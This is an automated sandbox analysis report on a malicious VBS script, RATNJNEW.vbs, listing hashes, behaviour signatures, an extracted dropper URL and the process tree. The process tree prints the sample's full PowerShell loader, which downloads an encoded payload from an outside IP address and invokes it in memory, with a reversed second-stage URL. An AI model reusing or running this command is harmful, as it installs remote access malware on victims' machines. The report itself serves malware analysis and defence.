Analysis

  • max time kernel
    412s
  • max time network
    415s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    26/09/2022, 22:08

General

  • Target

    RATNJNEW.vbs

  • Size

    577KB

  • MD5

    0673849361f4aa0726bc1e4704c3dc4b

  • SHA1

    76acf5375646a1885c361ca1838fa00c8e721ee2

  • SHA256

    b5732644184a1479c4fb17380de98dfa1ffe6135914aecdf960e34b96fd076bb

  • SHA512

    e7f67d92bc4b2ba7382af9f46b7f2d59869c6f3730d96575ac73d2d1a561e7c5fc1a82cc7537b13fa8eadaa0240d19484401972bd6b1e0b950a15e9b980890e9

  • SSDEEP

    96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHY:cKLosx0yRG

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RATNJNEW.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('1f6af02f9651-8cc9-7024-3ac8-2284e82a=nekot&aidem=tla?txt.saCtarJN02%4602%esabF2%4602%esab/o/moc.topsppa.ooomiisiisipaug/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:964

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/964-57-0x000007FEF49D0000-0x000007FEF53F3000-memory.dmp

          Filesize

          10.1MB

        • memory/964-58-0x0000000002774000-0x0000000002777000-memory.dmp

          Filesize

          12KB

        • memory/964-59-0x000007FEF3C80000-0x000007FEF47DD000-memory.dmp

          Filesize

          11.4MB

        • memory/964-60-0x000000000277B000-0x000000000279A000-memory.dmp

          Filesize

          124KB

        • memory/964-61-0x0000000002774000-0x0000000002777000-memory.dmp

          Filesize

          12KB

        • memory/964-62-0x000000000277B000-0x000000000279A000-memory.dmp

          Filesize

          124KB

        • memory/1192-54-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

          Filesize

          8KB